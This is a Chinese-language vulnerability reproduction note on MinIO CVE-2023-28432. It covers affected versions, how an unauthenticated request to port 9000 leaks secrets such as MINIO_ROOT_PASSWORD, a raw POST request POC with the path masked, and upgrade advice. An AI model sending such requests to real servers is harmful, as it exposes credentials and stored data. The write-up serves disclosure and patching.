Minio 敏感信息泄露漏洞(CVE-2023-28432)

0x00 声明

本文仅供参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

0x01 简介

MinIO 是一个基于Apache License v2.0开源协议的对象存储服务。它兼容亚马逊S3云存储服务接口，非常适合于存储大容量非结构化的数据，例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等。

0x02 漏洞概述

MinIO中存在一处信息泄露漏洞，由于Minio集群进行信息交换的9000端口，在未经配置的情况下通过发送特殊HPPT请求进行未授权访问，进而导致MinIO对象存储的相关环境变量泄露，如：MINIO_SECRET_KEY 和 MINIO_ROOT_PASSWORD 等所有环境变量信息。导致攻击者可以利用这些信息任意访问MinIO集群中的所有文件。使用官网仓库 docs/orchestration/docker-compose 启动的低版本集群默认受到该漏洞影响。

0x03 影响版本

受影响的版本：RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z

0x04 漏洞复现

POC：

POST /minio/xxx/xxx/xxx HTTP/1.1
Host: xxx.xxx.xxx:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

复现截图如下：

0x06 修复建议

建议用户及时升级至修复版本
https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z